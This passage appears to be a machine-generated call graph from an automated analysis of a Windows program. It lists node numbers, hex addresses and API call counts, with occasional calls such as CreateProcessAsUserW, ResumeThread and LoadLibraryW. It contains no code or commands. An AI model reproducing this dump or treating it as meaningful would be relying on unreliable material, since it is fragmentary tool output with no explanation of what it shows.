API calls 28540->28545 28544 27c4570 11 API calls 28541->28544 28547 27c4514 28541->28547 28542 27c4542 28542->28512 28546 27c4570 11 API calls 28543->28546 28544->28547 28545->28543 28549 27c47cd 28546->28549 28547->28542 28548 27c2c2c 11 API calls 28547->28548 28548->28542 28550 27c4500 11 API calls 28549->28550 28551 27c47f9 28550->28551 28551->28512 28554 27c44d6 28552->28554 28553 27c44fc 28553->28485 28554->28553 28555 27c2c2c 11 API calls 28554->28555 28555->28554 28557 27c4b85 28556->28557 28564 27c4bb5 28556->28564 28558 27c4bae 28557->28558 28560 27c4b91 28557->28560 28567 27c4570 28558->28567 28566 27c2c44 11 API calls 28560->28566 28562 27c4b9f 28562->28535 28572 27c44ac 28564->28572 28565->28535 28566->28562 28568 27c4598 28567->28568 28569 27c4574 28567->28569 28568->28564 28576 27c2c10 28569->28576 28571 27c4581 28571->28564 28573 27c44cd 28572->28573 28574 27c44b2 28572->28574 28573->28562 28574->28573 28586 27c2c2c 28574->28586 28577 27c2c27 28576->28577 28579 27c2c14 28576->28579 28577->28571 28578 27c2c1e 28578->28571 28579->28578 28580 27c2d19 28579->28580 28584 27c64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 28579->28584 28585 27c2ce8 7 API calls 28580->28585 28583 27c2d3a 28583->28571 28584->28580 28585->28583 28587 27c2c3a 28586->28587 28588 27c2c30 28586->28588 28587->28573 28588->28587 28589 27c2d19 28588->28589 28593 27c64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 28588->28593 28594 27c2ce8 7 API calls 28589->28594 28592 27c2d3a 28592->28573 28593->28589 28594->28592 28596 27c4500 11 API calls 28595->28596 28597 27d8043 28596->28597 28598 27d7914 12 API calls 28597->28598 28599 27d8050 28598->28599 28600 27d8058 GetModuleHandleA 28599->28600 28601 27d80c8 15 API calls 28600->28601 28602 27d8069 GetModuleHandleA 28601->28602 28603 27d8087 28602->28603 28604 27c44ac 11 API calls 28603->28604 28605 27d7d55 28604->28605 28605->28526 28606 27e67c4 28607 27c480c 11 API calls 28606->28607 28608 27e67e5 28607->28608 28609 27c4798 11 API calls 28608->28609 28610 27e681c 28609->28610 29423 27d8824 28610->29423 28613 27c480c 11 API calls 28614 27e6861 28613->28614 28615 27c4798 11 API calls 28614->28615 28616 27e6898 28615->28616 28617 27d8824 20 API calls 28616->28617 28618 27e68bc 28617->28618 28619 27c480c 11 API calls 28618->28619 28620 27e68dd 28619->28620 28621 27c4798 11 API calls 28620->28621 28622 27e6914 28621->28622 28623 27d8824 20 API calls 28622->28623 28624 27e6938 28623->28624 28625 27c480c 11 API calls 28624->28625 28626 27e6959 28625->28626 28627 27c4798 11 API calls 28626->28627 28628 27e6990 28627->28628 28629 27d8824 20 API calls 28628->28629 28630 27e69b4 28629->28630 28631 27c480c 11 API calls 28630->28631 28632 27e69d5 28631->28632 28633 27c4798 11 API calls 28632->28633 28634 27e6a0c 28633->28634 28635 27d8824 20 API calls 28634->28635 28636 27e6a30 28635->28636 28637 27c480c 11 API calls 28636->28637 28638 27e6a6a 28637->28638 29436 27ddf38 28638->29436 28640 27e6a99 29446 27de6c0 28640->29446 28643 27c480c 11 API calls 28644 27e6ae9 28643->28644 28645 27c4798 11 API calls 28644->28645 28646 27e6b20 28645->28646 28647 27d8824 20 API calls 28646->28647 28648 27e6b44 28647->28648 28649 27c480c 11 API calls 28648->28649 28650 27e6b65 28649->28650 28651 27c4798 11 API calls 28650->28651 28652 27e6b9c 28651->28652 28653 27d8824 20 API calls 28652->28653 28654 27e6bc0 28653->28654 28655 27c480c 11 API calls 28654->28655 28656 27e6be1 28655->28656 28657 27c4798 11 API calls 28656->28657 28658 27e6c18 28657->28658 28659 27d8824 20 API calls 28658->28659 28660 27e6c3c 28659->28660 28661 27c480c 11 API calls 28660->28661 28662 27e6c5d 28661->28662 28663 27c4798 11 API calls 28662->28663 28664 27e6c94 28663->28664 28665 27d8824 20 API calls 28664->28665 28666 27e6cb8 28665->28666 28667 27c480c 11 API calls 28666->28667 28668 27e6cd9 28667->28668 28669 27c4798 11 API calls 28668->28669 28670 27e6d10 28669->28670 28671 27d8824 20 API calls 28670->28671 28672 27e6d34 28671->28672 28673 27c480c 11 API calls 28672->28673 28674 27e6d55 28673->28674 28675 27c4798 11 API calls 28674->28675 28676 27e6d8c 28675->28676 28677 27d8824 20 API calls 28676->28677 28678 27e6db0 28677->28678 28679 27c480c 11 API calls 28678->28679 28680 27e6dd1 28679->28680 28681 27c4798 11 API calls 28680->28681 28682 27e6e08 28681->28682 28683 27d8824 20 API calls 28682->28683 28684 27e6e2c 28683->28684 28685 27c480c 11 API calls 28684->28685 28686 27e6e4d 28685->28686 28687 27c4798 11 API calls 28686->28687 28688 27e6e84 28687->28688 28689 27d8824 20 API calls 28688->28689 28690 27e6ea8 28689->28690 28691 27c480c 11 API calls 28690->28691 28692 27e6ec9 28691->28692 28693 27c4798 11 API calls 28692->28693 28694 27e6f00 28693->28694 28695 27d8824 20 API calls 28694->28695 28696 27e6f24 28695->28696 28697 27e7a68 28696->28697 28698 27e6f39 28696->28698 28699 27c480c 11 API calls 28697->28699 28700 27c480c 11 API calls 28698->28700 28701 27e7a89 28699->28701 28702 27e6f5a 28700->28702 28703 27c4798 11 API calls 28701->28703 28704 27c4798 11 API calls 28702->28704 28706 27e7ac0 28703->28706 28705 27e6f91 28704->28705 28707 27d8824 20 API calls 28705->28707 28708 27d8824 20 API calls 28706->28708 28709 27e6fb5 28707->28709 28710 27e7ae4 28708->28710 28712 27c480c 11 API calls 28709->28712 28711 27c480c 11 API calls 28710->28711 28713 27e7b05 28711->28713 28714 27e6fd6 28712->28714 28715 27c4798 11 API calls 28713->28715 28716 27c4798 11 API calls 28714->28716 28717 27e7b3c 28715->28717 28718 27e700d 28716->28718 28720 27d8824 20 API calls 28717->28720 28719 27d8824 20 API calls 28718->28719 28721 27e7031 28719->28721 28722 27e7b60 28720->28722 28723 27c480c 11 API calls 28721->28723 28724 27c480c 11 API calls 28722->28724 28726 27e7052 28723->28726 28725 27e7b81 28724->28725 28727 27c4798 11 API calls 28725->28727 28728 27c4798 11 API calls 28726->28728 28729 27e7bb8 28727->28729 28730 27e7089 28728->28730 28731 27d8824 20 API calls 28729->28731 28732 27d8824 20 API calls 28730->28732 28734 27e7bdc 28731->28734 28733 27e70ad 28732->28733 28735 27c4798 11 API calls 28733->28735 28736 27c480c 11 API calls 28734->28736 28737 27e70c5 28735->28737 28738 27e7bfd 28736->28738 29903 27d8410 28737->29903 28741 27c4798 11 API calls 28738->28741 28740 27e70d6 28742 27c480c 11 API calls 28740->28742 28743 27e7c34 28741->28743 28744 27e70f7 28742->28744 28745 27d8824 20 API calls 28743->28745 28746 27c4798 11 API calls 28744->28746 28747 27e7c58 28745->28747 28748 27e712e 28746->28748 28749 27e7c6d 28747->28749 28750 27e8af1 28747->28750 28753 27d8824 20 API calls 28748->28753 28752 27c480c 11 API calls 28749->28752 28751 27c480c 11 API calls 28750->28751 28758 27e8b12 28751->28758 28754 27e7c8e 28752->28754 28755 27e7152 28753->28755 28757 27e7ca6 28754->28757 28756 27c480c 11 API calls 28755->28756 28762 27e7173 28756->28762 28759 27c4798 11 API calls 28757->28759 28760 27c4798 11 API calls 28758->28760 28761 27e7cc5 28759->28761 28764 27e8b49 28760->28764 28765 27e7cdd 28761->28765 28763 27c4798 11 API calls 28762->28763 28770 27e71aa 28763->28770 28766 27d8824 20 API calls 28764->28766 28767 27d8824 20 API calls 28765->28767 28768 27e8b6d 28766->28768 28769 27e7ce9 28767->28769 28771 27c480c 11 API calls 28768->28771 28772 27c480c 11 API calls 28769->28772 28773 27d8824 20 API calls 28770->28773 28777 27e8b8e 28771->28777 28774 27e7d0a 28772->28774 28775 27e71ce 28773->28775 28778 27e7d15 28774->28778 28776 27c480c 11 API calls 28775->28776 28782 27e71ef 28776->28782 28780 27c4798 11 API calls 28777->28780 28779 27c4798 11 API calls 28778->28779 28781 27e7d41 28779->28781 28784 27e8bc5 28780->28784 28785 27e7d4c 28781->28785 28783 27c4798 11 API calls 28782->28783 28790 27e7226 28783->28790 28786 27d8824 20 API calls 28784->28786 28787 27d8824 20 API calls 28785->28787 28788 27e8be9 28786->28788 28789 27e7d65 28787->28789 28791 27c480c 11 API calls 28788->28791 28792 27c480c 11 API calls 28789->28792 28793 27d8824 20 API calls 28790->28793 28794 27e8c0a 28791->28794 28795 27e7d86 28792->28795 28796 27e724a 28793->28796 28797 27c4798 11 API calls 28794->28797 28798 27c4798 11 API calls 28795->28798 29915 27dac38 29 API calls 28796->29915 28803 27e8c41 28797->28803 28802 27e7dbd 28798->28802 28800 27e7271 28801 27c480c 11 API calls 28800->28801 28807 27e7292 28801->28807 28805 27d8824 20 API calls 28802->28805 28804 27d8824 20 API calls 28803->28804 28815 27e8c65 28804->28815 28806 27e7de1 28805->28806 28808 27c4798 11 API calls 28806->28808 28810 27c4798 11 API calls 28807->28810 28809 27e7e0d 28808->28809 28813 27e7e25 28809->28813 28814 27e72c9 28810->28814 28811 27e9420 28812 27c480c 11 API calls 28811->28812 28818 27e9441 28812->28818 28819 27e7e30 CreateProcessAsUserW 28813->28819 28817 27d8824 20 API calls 28814->28817 28815->28811 28816 27c480c 11 API calls 28815->28816 28828 27e8cb0 28816->28828 28820 27e72ed 28817->28820 28825 27c4798 11 API calls 28818->28825 28821 27e7ebe 28819->28821 28822 27e7e42 28819->28822 28824 27c480c 11 API calls 28820->28824 28826 27c480c 11 API calls 28821->28826 28823 27c480c 11 API calls 28822->28823 28827 27e7e63 28823->28827 28832 27e730e 28824->28832 28833 27e9478 28825->28833 28831 27e7edf 28826->28831 28829 27e7e6e 28827->28829 28830 27c4798 11 API calls 28828->28830 28836 27c4798 11 API calls 28829->28836 28839 27e8ce7 28830->28839 28835 27c4798 11 API calls 28831->28835 28837 27c4798 11 API calls 28832->28837 28834 27d8824 20 API calls 28833->28834 28838 27e949c 28834->28838 28845 27e7f16 28835->28845 28840 27e7e9a 28836->28840 28846 27e7345 28837->28846 28841 27c480c 11 API calls 28838->28841 28842 27d8824 20 API calls 28839->28842 28843 27e7ea5 28840->28843 28849 27e94bd 28841->28849 28844 27e8d0b 28842->28844 28851 27d8824 20 API calls 28843->28851 28847 27c480c 11 API calls 28844->28847 28850 27d8824 20 API calls 28845->28850 28848 27d8824 20 API calls 28846->28848 28857 27e8d2c 28847->28857 28852 27e7369 28848->28852 28855 27c4798 11 API calls 28849->28855 28853 27e7f3a 28850->28853 28851->28821 28854 27c480c 11 API calls 28852->28854 28856 27c480c 11 API calls 28853->28856 28860 27e738a 28854->28860 28861 27e94f4 28855->28861 28859 27e7f5b 28856->28859 28858 27c4798 11 API calls 28857->28858 28865 27e8d63 28858->28865 28862 27c4798 11 API calls 28859->28862 28863 27c4798 11 API calls 28860->28863 28864 27d8824 20 API calls 28861->28864 28870 27e7f92 28862->28870 28871 27e73c1 28863->28871 28866 27e9518 28864->28866 28868 27d8824 20 API calls 28865->28868 28867 27c480c 11 API calls 28866->28867 28873 27e9539 28867->28873 28869 27e8d87 28868->28869 28872 27c480c 11 API calls 28869->28872 28874 27d8824 20 API calls 28870->28874 28875 27d8824 20 API calls 28871->28875 28879 27e8da8 28872->28879 28878 27c4798 11 API calls 28873->28878 28877 27e7fb6 28874->28877 28876 27e73e5 28875->28876 28881 27c480c 11 API calls 28876->28881 28880 27c49a4 11 API calls 28877->28880 28884 27e9570 28878->28884 28883 27c4798 11 API calls 28879->28883 28882 27e7fda 28880->28882 28887 27e7425 28881->28887 28885 27c480c 11 API calls 28882->28885 28889 27e8ddf 28883->28889 28888 27d8824 20 API calls 28884->28888 28886 27e8009 28885->28886 28894 27e8014 28886->28894 28890 27c4798 11 API calls 28887->28890 28892 27e9594 28888->28892 28891 27d8824 20 API calls 28889->28891 28900 27e745c 28890->28900 28893 27e8e03 28891->28893 28897 27d8824 20 API calls 28892->28897 29458 27de540 28893->29458 28896 27c4798 11 API calls 28894->28896 28899 27e8040 28896->28899 28905 27e95c7 28897->28905 28906 27e804b 28899->28906 28902 27d8824 20 API calls 28900->28902 28901 27c480c 11 API calls 28907 27e8e47 28901->28907 28903 27e7480 28902->28903 28904 27c480c 11 API calls 28903->28904 28913 27e74a1 28904->28913 28909 27d8824 20 API calls 28905->28909 28908 27d8824 20 API calls 28906->28908 28911 27c480c 11 API calls 28907->28911 28910 27e8064 28908->28910 28915 27e95fa 28909->28915 28912 27c480c 11 API calls 28910->28912 28917 27e8e7f 28911->28917 28916 27e8085 28912->28916 28914 27c4798 11 API calls 28913->28914 28921 27e74d8 28914->28921 28918 27d8824 20 API calls 28915->28918 28920 27c4798 11 API calls 28916->28920 28919 27c4798 11 API calls 28917->28919 28922 27e962d 28918->28922 28924 27e8eb6 28919->28924 28925 27e80bc 28920->28925 28923 27d8824 20 API calls 28921->28923 28927 27d8824 20 API calls 28922->28927 28926 27e74fc 28923->28926 28930 27d8824 20 API calls 28924->28930 28931 27d8824 20 API calls 28925->28931 28928 27c480c 11 API calls 28926->28928 28929 27e9660 28927->28929 28937 27e751d 28928->28937 28932 27c480c 11 API calls 28929->28932 28933 27e8eda 28930->28933 28934 27e80e0 28931->28934 28939 27e9681 28932->28939 28935 27c480c 11 API calls 28933->28935 28936 27c480c 11 API calls 28934->28936 28941 27e8efb 28935->28941 28940 27e8101 28936->28940 28938 27c4798 11 API calls 28937->28938 28945 27e7554 28938->28945 28942 27c4798 11 API calls 28939->28942 28943 27c4798 11 API calls 28940->28943 28944 27c4798 11 API calls 28941->28944 28946 27e96b8 28942->28946 28949 27e8138 28943->28949 28948 27e8f32 28944->28948 28947 27d8824 20 API calls 28945->28947 28951 27d8824 20 API calls 28946->28951 28950 27e7578 28947->28950 28954 27d8824 20 API calls 28948->28954 28955 27d8824 20 API calls 28949->28955 29916 27d5a74 42 API calls 28950->29916 28953 27e96dc 28951->28953 28958 27c480c 11 API calls 28953->28958 28959 27e8f56 28954->28959 28960 27e815c 28955->28960 28957 27e75a4 28965 27c4b78 11 API calls 28957->28965 28969 27e96fd 28958->28969 29465 27c7e18 28959->29465 29919 27dcfa4 23 API calls 28960->29919 28964 27e8170 28967 27c480c 11 API calls 28964->28967 28968 27e75b9 28965->28968 28966 27e921a 28970 27c480c 11 API calls 28966->28970 28974 27e8196 28967->28974 28972 27c480c 11 API calls 28968->28972 28973 27c4798 11 API calls 28969->28973 28975 27e923b 28970->28975 28971 27c480c 11 API calls 28976 27e8f89 28971->28976 28978 27e75da 28972->28978 28980 27e9734 28973->28980 28977 27c4798 11 API calls 28974->28977 28981 27c4798 11 API calls 28975->28981 28979 27c4798 11 API calls 28976->28979 28985 27e81cd 28977->28985 28982 27c4798 11 API calls 28978->28982 28988 27e8fc0 28979->28988 28983 27d8824 20 API calls 28980->28983 28987 27e9272 28981->28987 28990 27e7611 28982->28990 28984 27e9758 28983->28984 28986 27c480c 11 API calls 28984->28986 28989 27d8824 20 API calls 28985->28989 28999 27e9779 28986->28999 28991 27d8824 20 API calls 28987->28991 28992 27d8824 20 API calls 28988->28992 28993 27e81f1 28989->28993 28994 27d8824 20 API calls 28990->28994 28995 27e9296 28991->28995 28996 27e8fe4 28992->28996 28997 27c480c 11 API calls 28993->28997 28998 27e7635 28994->28998 29000 27c480c 11 API calls 28995->29000 29001 27c480c 11 API calls 28996->29001 29004 27e8212 28997->29004 29003 27c49a4 11 API calls 28998->29003 29002 27c4798 11 API calls 28999->29002 29006 27e92b7 29000->29006 29007 27e9005 29001->29007 29011 27e97b0 29002->29011 29005 27e7652 29003->29005 29008 27c4798 11 API calls 29004->29008 29917 27d7dd8 17 API calls 29005->29917 29012 27c4798 11 API calls 29006->29012 29013 27c4798 11 API calls 29007->29013 29016 27e8249 29008->29016 29010 27e7658 29014 27c480c 11 API calls 29010->29014 29015 27d8824 20 API calls 29011->29015 29017 27e92ee 29012->29017 29018 27e903c 29013->29018 29020 27e7679 29014->29020 29021 27e97d4 29015->29021 29019 27d8824 20 API calls 29016->29019 29022 27d8824 20 API calls 29017->29022 29023 27d8824 20 API calls 29018->29023 29024 27e826d 29019->29024 29028 27c4798 11 API calls 29020->29028 29029 27d8824 20 API calls 29021->29029 29025 27e9312 29022->29025 29026 27e9060 29023->29026 29027 27c480c 11 API calls 29024->29027 29030 27c480c 11 API calls 29025->29030 29031 27c480c 11 API calls 29026->29031 29033 27e828e 29027->29033 29032 27e76b0 29028->29032 29034 27e9807 29029->29034 29035 27e9333 29030->29035 29036 27e9081 29031->29036 29037 27d8824 20 API calls 29032->29037 29038 27c4798 11 API calls 29033->29038 29040 27d8824 20 API calls 29034->29040 29041 27c4798 11 API calls 29035->29041 29042 27c4798 11 API calls 29036->29042 29039 27e76d4 29037->29039 29044 27e82c5 29038->29044 29043 27c480c 11 API calls 29039->29043 29046 27e983a 29040->29046 29047 27e936a 29041->29047 29045 27e90b8 29042->29045 29049 27e76f5 29043->29049 29048 27d8824 20 API calls 29044->29048 29052 27d8824 20 API calls 29045->29052 29050 27d8824 20 API calls 29046->29050 29051 27d8824 20 API calls 29047->29051 29053 27e82e9 29048->29053 29058 27c4798 11 API calls 29049->29058 29063 27e986d 29050->29063 29054 27e938e 29051->29054 29055 27e90dc 29052->29055 29056 27e8309 29053->29056 29057 27e82f2 29053->29057 29059 27c480c 11 API calls 29054->29059 29060 27c480c 11 API calls 29055->29060 29062 27c480c 11 API calls 29056->29062 29920 27d8584 17 API calls 29057->29920 29064 27e772c 29058->29064 29066 27e93af 29059->29066 29067 27e90fd 29060->29067 29068 27e832a 29062->29068 29065 27d8824 20 API calls 29063->29065 29069 27d8824 20 API calls 29064->29069 29075 27e98a0 29065->29075 29071 27c4798 11 API calls 29066->29071 29072 27c4798 11 API calls 29067->29072 29073 27c4798 11 API calls 29068->29073 29070 27e7750 29069->29070 29074 27c480c 11 API calls 29070->29074 29078 27e93e6 29071->29078 29079 27e9134 29072->29079 29076 27e8361 29073->29076 29080 27e7771 29074->29080 29077 27d8824 20 API calls 29075->29077 29083 27d8824 20 API calls 29076->29083 29081 27e98d3 29077->29081 29085 27d8824 20 API calls 29078->29085 29082 27d8824 20 API calls 29079->29082 29088 27c4798 11 API calls 29080->29088 29084 27c480c 11 API calls 29081->29084 29086 27e9158 29082->29086 29087 27e8385 29083->29087 29094 27e98f4 29084->29094 29089 27e940a 29085->29089 29091 27c480c 11 API calls 29086->29091 29092 27c480c 11 API calls 29087->29092 29096 27e77a8 29088->29096 29484 27c49a4 29089->29484 29098 27e9179 29091->29098 29099 27e83a6 29092->29099 29097 27c4798 11 API calls 29094->29097 29100 27d8824 20 API calls 29096->29100 29105 27e992b 29097->29105 29102 27c4798 11 API calls 29098->29102 29103 27c4798 11 API calls 29099->29103 29101 27e77cc 29100->29101 29104 27c480c 11 API calls 29101->29104 29108 27e91b0 29102->29108 29106 27e83dd 29103->29106 29109 27e77ed 29104->29109 29107 27d8824 20 API calls 29105->29107 29111 27d8824 20 API calls 29106->29111 29110 27e994f 29107->29110 29113 27d8824 20 API calls 29108->29113 29115 27c4798 11 API calls 29109->29115 29112 27c480c 11 API calls 29110->29112 29114 27e8401 29111->29114 29118 27e9970 29112->29118 29121 27e91d4 29113->29121 29116 27c480c 11 API calls 29114->29116 29119 27e7824 29115->29119 29117 27e8422 29116->29117 29125 27c4798 11 API calls 29117->29125 29120 27c4798 11 API calls 29118->29120 29122 27d8824 20 API calls 29119->29122 29127 27e99a7 29120->29127 29469 27ddacc 29121->29469 29123 27e7848 29122->29123 29918 27daf58 39 API calls 29123->29918 29129 27e8459 29125->29129 29128 27d8824 20 API calls 29127->29128 29134 27e99cb 29128->29134 29131 27d8824 20 API calls 29129->29131 29130 27e7859 29132 27e847d ResumeThread 29131->29132 29133 27c480c 11 API calls 29132->29133 29138 27e84a9 29133->29138 29135 27d8824 20 API calls 29134->29135 29136 27e99fe 29135->29136 29137 27c480c 11 API calls 29136->29137 29140 27e9a1f 29137->29140 29139 27c4798 11 API calls 29138->29139 29142 27e84e0 29139->29142 29141 27c4798 11 API calls 29140->29141 29146 27e9a56 29141->29146 29143 27d8824 20 API calls 29142->29143 29144 27e8504 29143->29144 29145 27c480c 11 API calls 29144->29145 29149 27e8525 29145->29149 29147 27d8824 20 API calls 29146->29147 29148 27e9a7a 29147->29148 29150 27c480c 11 API calls 29148->29150 29151 27c4798 11 API calls 29149->29151 29152 27e9a9b 29150->29152 29154 27e855c 29151->29154 29153 27c4798 11 API calls 29152->29153 29157 27e9ad2 29153->29157 29155 27d8824 20 API calls 29154->29155 29156 27e8580 29155->29156 29158 27c480c 11 API calls 29156->29158 29159 27d8824 20 API calls 29157->29159 29161 27e85a1 29158->29161 29160 27e9af6 29159->29160 29162 27c480c 11 API calls 29160->29162 29163 27c4798 11 API calls 29161->29163 29164 27e9b17 29162->29164 29166 27e85d8 29163->29166 29165 27c4798 11 API calls 29164->29165 29169 27e9b4e 29165->29169 29167 27d8824 20 API calls 29166->29167 29168 27e85fc CloseHandle 29167->29168 29170 27c480c 11 API calls 29168->29170 29171 27d8824 20 API calls 29169->29171 29172 27e8628 29170->29172 29174 27e9b72 29171->29174 29173 27c4798 11 API calls 29172->29173 29176 27e865f 29173->29176 29175 27d8824 20 API calls 29174->29175 29177 27e9ba5 29175->29177 29178 27d8824 20 API calls 29176->29178 29180 27d8824 20 API calls 29177->29180 29179 27e8683 29178->29179 29181 27c480c 11 API calls 29179->29181 29182 27e9bd8 29180->29182 29183 27e86a4 29181->29183 29185 27d8824 20 API calls 29182->29185 29184 27c4798 11 API calls 29183->29184 29186 27e86db 29184->29186 29187 27e9c0b 29185->29187 29189 27d8824 20 API calls 29186->29189 29188 27d8824 20 API calls 29187->29188 29190 27e9c3e 29188->29190 29191 27e86ff 29189->29191 29192 27c480c 11 API calls 29190->29192 29193 27c480c 11 API calls 29191->29193 29194 27e9c5f 29192->29194 29195 27e8720 29193->29195 29196 27c4798 11 API calls 29194->29196 29197 27c4798 11 API calls 29195->29197 29199 27e9c96 29196->29199 29198 27e8757 29197->29198 29200 27d8824 20 API calls 29198->29200 29201 27d8824 20 API calls 29199->29201 29202 27e877b 29200->29202 29203 27e9cba 29201->29203 29205 27c480c 11 API calls 29202->29205 29204 27c480c 11 API calls 29203->29204 29206 27e9cdb 29204->29206 29207 27e879c 29205->29207 29208 27c4798 11 API calls 29206->29208 29209 27c4798 11 API calls 29207->29209 29211 27e9d12 29208->29211 29210 27e87d3 29209->29210 29212 27d8824 20 API calls 29210->29212 29213 27d8824 20 API calls 29211->29213 29214 27e87f7 29212->29214 29216 27e9d36 29213->29216 29215 27c480c 11 API calls 29214->29215 29218 27e8818 29215->29218 29217 27d8824 20 API calls 29216->29217 29220 27e9d69 29217->29220 29219 27c4798 11 API calls 29218->29219 29222 27e884f 29219->29222 29221 27d8824 20 API calls 29220->29221 29226 27e9d9c 29221->29226 29223 27d8824 20 API calls 29222->29223 29224 27e8873 29223->29224 29225 27c480c 11 API calls 29224->29225 29228 27e8894 29225->29228 29227 27d8824 20 API calls 29226->29227 29229 27e9dcf 29227->29229 29230 27c4798 11 API calls 29228->29230 29231 27d8824 20 API calls 29229->29231 29232 27e88cb 29230->29232 29233 27e9e02 29231->29233 29234 27d8824 20 API calls 29232->29234 29237 27d8824 20 API calls 29233->29237 29235 27e88ef 29234->29235 29236 27c480c 11 API calls 29235->29236 29240 27e8910 29236->29240 29238 27e9e35 29237->29238 29239 27c480c 11 API calls 29238->29239 29241 27e9e56 29239->29241 29242 27c4798 11 API calls 29240->29242 29243 27c4798 11 API calls 29241->29243 29244 27e8947 29242->29244 29245 27e9e8d 29243->29245 29246 27d8824 20 API calls 29244->29246 29248 27d8824 20 API calls 29245->29248 29247 27e896b 29246->29247 29921 27d87a0 LoadLibraryW 29247->29921 29249 27e9eb1 29248->29249 29251 27c480c 11 API calls 29249->29251 29256 27e9ed2 29251->29256 29253 27d87a0 21 API calls 29254 27e899e 29253->29254 29255 27d87a0 21 API calls 29254->29255 29257 27e89b2 29255->29257 29258 27c4798 11 API calls 29256->29258 29259 27d87a0 21 API calls 29257->29259 29263 27e9f09 29258->29263 29260 27e89c6 29259->29260 29261 27d87a0 21 API calls 29260->29261 29262 27e89da 29261->29262 29264 27d87a0 21 API calls 29262->29264 29266 27d8824 20 API calls 29263->29266 29265 27e89ee CloseHandle 29264->29265 29267 27c480c 11 API calls 29265->29267 29268 27e9f2d 29266->29268 29270 27e8a1a 29267->29270 29269 27c480c 11 API calls 29268->29269 29272 27e9f4e 29269->29272 29271 27c4798 11 API calls 29270->29271 29274 27e8a51 29271->29274 29273 27c4798 11 API calls 29272->29273 29275 27e9f85 29273->29275 29276 27d8824 20 API calls 29274->29276 29278 27d8824 20 API calls 29275->29278 29277 27e8a75 29276->29277 29279 27c480c 11 API calls 29277->29279 29280 27e9fa9 29278->29280 29282 27e8a96 29279->29282 29281 27c480c 11 API calls 29280->29281 29284 27e9fca 29281->29284 29283 27c4798 11 API calls 29282->29283 29286 27e8acd 29283->29286 29285 27c4798 11 API calls 29284->29285 29287 27ea001 29285->29287 29288 27d8824 20 API calls 29286->29288 29289 27d8824 20 API calls 29287->29289 29288->28750 29290 27ea025 29289->29290 29291 27c480c 11 API calls 29290->29291 29292 27ea046 29291->29292 29293 27c4798 11 API calls 29292->29293 29294 27ea07d 29293->29294 29295 27d8824 20 API calls 29294->29295 29296 27ea0a1 29295->29296 29297 27d8824 20 API calls 29296->29297 29298 27ea0b0 29297->29298 29299 27d8824 20 API calls 29298->29299 29300 27ea0bf 29299->29300 29301 27d8824 20 API calls 29300->29301 29302 27ea0ce 29301->29302 29303 27d8824 20 API calls 29302->29303 29304 27ea0dd 29303->29304 29305 27d8824 20 API calls 29304->29305 29306 27ea0ec 29305->29306 29307 27d8824 20 API calls 29306->29307 29308 27ea0fb 29307->29308 29309 27d8824 20 API calls 29308->29309 29310 27ea10a 29309->29310 29311 27d8824 20 API calls 29310->29311 29312 27ea119 29311->29312 29313 27d8824 20 API calls 29312->29313 29314 27ea128 29313->29314 29315 27d8824 20 API calls 29314->29315 29316 27ea137 29315->29316 29317 27d8824 20 API calls 29316->29317 29318 27ea146 29317->29318 29319 27d8824 20 API calls 29318->29319 29320 27ea155 29319->29320 29321 27d8824 20 API calls 29320->29321 29322 27ea164 29321->29322 29323 27d8824 20 API calls 29322->29323 29324 27ea173 29323->29324 29325 27d8824 20 API calls 29324->29325 29326 27ea182 29325->29326 29327 27c480c 11 API calls 29326->29327 29328 27ea1a3 29327->29328 29329 27c4798 11 API calls 29328->29329 29330 27ea1da 29329->29330 29331 27d8824 20 API calls 29330->29331 29332 27ea1fe 29331->29332 29333 27d8824 20 API calls 29332->29333 29334 27ea231 29333->29334 29335 27d8824 20 API calls 29334->29335 29336 27ea264 29335->29336 29337 27d8824 20 API calls 29336->29337 29338 27ea297 29337->29338 29339 27d8824 20 API calls 29338->29339 29340 27ea2ca 29339->29340 29341 27d8824 20 API calls 29340->29341 29342 27ea2fd 29341->29342 29343 27d8824 20 API calls 29342->29343 29344 27ea330 29343->29344 29345 27d8824 20 API calls 29344->29345 29346 27ea363 29345->29346 29347 27c480c 11 API calls 29346->29347 29348 27ea384 29347->29348 29349 27c4798 11 API calls 29348->29349 29350 27ea3bb 29349->29350 29351 27d8824 20 API calls 29350->29351 29352 27ea3df 29351->29352 29353 27c480c 11 API calls 29352->29353 29354 27ea400 29353->29354 29355 27c4798 11 API calls 29354->29355 29356 27ea437 29355->29356 29357 27d8824 20 API calls 29356->29357 29358 27ea45b 29357->29358 29359 27c480c 11 API calls 29358->29359 29360 27ea47c 29359->29360 29361 27c4798 11 API calls 29360->29361 29362 27ea4b3 29361->29362 29363 27d8824 20 API calls 29362->29363 29364 27ea4d7 29363->29364 29365 27d8824 20 API calls 29364->29365 29366 27ea50a 29365->29366 29367 27d8824 20 API calls 29366->29367 29368 27ea53d 29367->29368 29369 27d8824 20 API calls 29368->29369 29370 27ea570 29369->29370 29371 27d8824 20 API calls 29370->29371 29372 27ea5a3 29371->29372 29373 27d8824 20 API calls 29372->29373 29374 27ea5d6 29373->29374 29375 27d8824 20 API calls 29374->29375 29376 27ea609 29375->29376 29377 27d8824 20 API calls 29376->29377 29378 27ea63c 29377->29378 29379 27d8824 20 API calls 29378->29379 29380 27ea66f 29379->29380 29381 27d8824 20 API calls 29380->29381 29382 27ea6a2 29381->29382 29383 27d8824 20 API calls 29382->29383 29384 27ea6d5 29383->29384 29385 27d8824 20 API calls 29384->29385 29386 27ea708 29385->29386 29387 27d8824 20 API calls 29386->29387 29388 27ea73b 29387->29388 29389 27d8824 20 API calls 29388->29389 29390 27ea76e 29389->29390 29391 27d8824 20 API calls 29390->29391 29392 27ea7a1 29391->29392 29393 27d8824 20 API calls 29392->29393 29394 27ea7d4 29393->29394 29395 27d8824 20 API calls 29394->29395 29396 27ea807 29395->29396 29397 27d8824 20 API calls 29396->29397 29398 27ea83a 29397->29398 29399 27d8824 20 API calls 29398->29399 29400 27ea86d 29399->29400 29401 27d8824 20 API calls 29400->29401 29402 27ea8a0 29401->29402 29891 27d818c 29402->29891 29405 27c480c 11 API calls 29406 27ea8d0 29405->29406 29407 27c4798 11 API calls 29406->29407 29408 27ea907 29407->29408 29409 27d8824 20 API calls 29408->29409 29410 27ea92b 29409->29410 29411 27c480c 11 API calls 29410->29411 29412 27ea94c 29411->29412 29413 27c4798 11 API calls 29412->29413 29414 27ea983 29413->29414 29415 27d8824 20 API calls 29414->29415 29416 27ea9a7 29415->29416 29417 27c480c 11 API calls 29416->29417 29418 27ea9c8 29417->29418 29419 27c4798 11 API calls 29418->29419 29420 27ea9ff 29419->29420 29421 27d8824 20 API calls 29420->29421 29422 27eaa23 